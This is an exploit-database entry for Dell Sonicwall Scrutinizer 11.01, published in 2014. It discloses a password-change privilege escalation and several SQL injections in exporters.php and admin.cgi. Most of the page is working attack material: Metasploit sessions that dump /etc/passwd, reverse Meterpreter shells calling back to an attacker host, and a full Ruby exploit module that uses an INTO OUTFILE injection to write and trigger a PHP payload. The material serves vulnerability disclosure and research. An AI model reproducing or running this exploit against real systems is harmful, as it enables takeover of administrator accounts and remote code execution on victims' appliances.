Dell Sonicwall Scrutinizer 11.01 Code Execution / SQL Injection



EKU-ID: 4141 CVE: OSVDB-ID:
Author: Brandon Perry Published: 2014-07-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Dell Scrutinizer 11.01 several vulnerabilities
http://www.mysonicwall.com has a trial available.
 
 
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with
remote code execution. An attacker needs to be authenticated, but not as an administrator.
However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that
any authenticated user can change any other user’s password, including the admin. One SQL
injection, which a Metasploit module was provided for, requires this privilege escalation to reach
since it exists in the new user mechanism only available to admins.
 
Privilege escalation via password change mechanism
———————————————————-
When changing you password, you POST a request with a savePrefs variable. This variable is
actually the id of the user whose password is being changed. By changing it to ‘1’, for instance,
you will change the password for the person with an ID of 1 (which is always admin as far as I
can tell).
 
 
SQL injection in new user mechanism (requires admin)
————————————————————-
When creating a new user, the selectedUserGroup variable POSTed to /cgi-bin/admin.cgi is
vulnerable to SQL injection that allows an attacker to read an arbitrary file from the FS.
 
A Metasploit module was provided that exploits the above two vulnerabilities to escalate an
arbitrary authenticated user to admin, which then will read /etc/passwd via the SQL injection.
See auxiliary module scrutinizer_password_change.rb.
 
 
msf auxiliary(scrutinizer_password_change) > show options
 
Module options (auxiliary/gather/scrutinizer_password_change):
 
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME /etc/passwd yes The file to read from the admin sqli
PASSWORD password no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERID 1 yes The ID of the user to have their password changed. 'admin' is
always 1.
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
 
msf auxiliary(scrutinizer_password_change) > run
 
[+] Log in with the user's name and the password 'passw0rd!'
[+] Attempting to read file using 'admin' account: /etc/passwd
[+] root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin!operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
plixer:x:500:500::/home/plixer:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
 
[*] Auxiliary module execution completed
msf auxiliary(scrutinizer_password_change) >
 
 
 
Within the appliance, you may see /home/plixer/scrutinizer/html/d4d/exporters.php. This script,
which is used actively throughout the web UI, is riddled with SQL injections. You can read the
file and see the way the programmer(s?) is building their SQL injections. I will detail some of the
injections that I could exploit and achieve RCE with (with Metasploit modules).
 
The changeUnit function is vulnerable to a UNION-based SQL injection in the user_id parameter
which allows a remote user to write a file to the filesystem via the OUTFILE vector. We have
write permissions on the folder from the sql injection, so a PHP script can be written to /home/
plixer/scrutinizer/html/d4d/ and the code will be executed upon a GET. A metasploit module was
provided for this. (see scrutinizer_changeunit_sqli_exec.rb)
 
msf exploit(scrutinizer_changeunit_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_changeunit_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_changeunit_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_changeunit_sqli_exec) > exploit
 
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 3 opened (192.168.1.31:4444 -> 192.168.1.99:55077) at 2014-04-20
12:18:22 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/q0Oe8orPuCgoBAgk.php
 
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter >
 
 
 
The methodDetail function is vulnerable to a UNION-based SQL injection similar to the one
above. The methodDetail parameter itself is what is vulnerable. A metasploit module that
achieves RCE via this vector has been supplied. ( see scrutinizer_methoddetail_sqli_exec.rb)
 
msf exploit(scrutinizer_methoddetail_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_methoddetail_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_methoddetail_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_methoddetail_sqli_exec) > exploit
!
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 2 opened (192.168.1.31:4444 -> 192.168.1.99:55063) at 2014-04-20
12:16:23 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/6QOILiKezqXHEU07.php
 
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter >
 
 
The xcNetworkDetail function is vulnerable to a UNION-based SQL injection like the ones
above. The xcNetworkDetail parameter is itself what is vulnerable. A metasploit module was
provided for this. (see scrutinizer_xcnetworkdetail_sqli_exec.rb)
 
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > exploit
 
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:55045) at 2014-04-20
12:14:57 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/AJ7W4nC4TOpLuS4F.php
 
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter > 

=======

# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution",
      'Description'    => %q{
      Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
      an attacker to write arbitrary files to the file system. This vulnerability is used
      to write a PHP script to the file system to gain RCE.

      This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
      },
      'License'        => MSF_LICENSE,
      'Author'         => [],
      'References'     => [],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Dell Sonicwall Scrutinizer 11.01', {}],],
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))

      register_options(
      [
          OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
          OptString.new('USERNAME', [ false,  "The username to authenticate as"]),
          OptString.new('PASSWORD', [ false,  "The password to authenticate with" ])
      ], self.class)
  end

  def exploit
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
      'vars_get' => {
        'name' => datastore['USERNAME'],
        'pwd' => datastore['PASSWORD']
      }
    })

    res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
    sessionid = $2

    cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}"

    hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join

    post = {
      'ti' => 1,
      'limit' => 25,
      'page' => 0,
      'order' => '',
      'dir' => 'DESC',
      'bbp' => 'percent',
      'changeUnit' => '',
      #should be trivial to support windows, just change the paths
      'user_id' => "-9513 OR 9319=9319 LIMIT 0,1 INTO OUTFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php' LINES TERMINATED BY 0x#{hexstr}"
    }

    register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php")

    send_request_cgi({
      'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
      'method' => 'POST',
      'vars_post' => post,
      'cookie' => cookie
    })

    send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")})
  end
end

__END__
                        msf exploit(scrutinizer_sqli_exec) > show options

                        Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec):

                        Name       Current Setting  Required  Description
                        ----       ---------------  --------  -----------
                        PASSWORD   passw0rd!        no        The password to authenticate with
                        Proxies                     no        Use a proxy chain
                        RHOST      192.168.1.99     yes       The target address
                        RPORT      80               yes       The target port
                        TARGETURI  /                yes       Base Application path
                        USERNAME   username         no        The username to authenticate as
                        VHOST                       no        HTTP server virtual host


                        Exploit target:

                        Id  Name
                        --  ----
                        0   Dell Sonicwall Scrutinizer 11.01


                        msf exploit(scrutinizer_sqli_exec) > exploit

                        [*] Started reverse handler on 192.168.1.31:4444 
                        [*] Sending stage (39195 bytes) to 192.168.1.99
                        [*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600

                        meterpreter > shell
                        Process 3038 created.
                        Channel 0 created.
                        id
                        uid=48(apache) gid=48(apache) groups=48(apache),500(plixer)
                        uname -a
                        Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux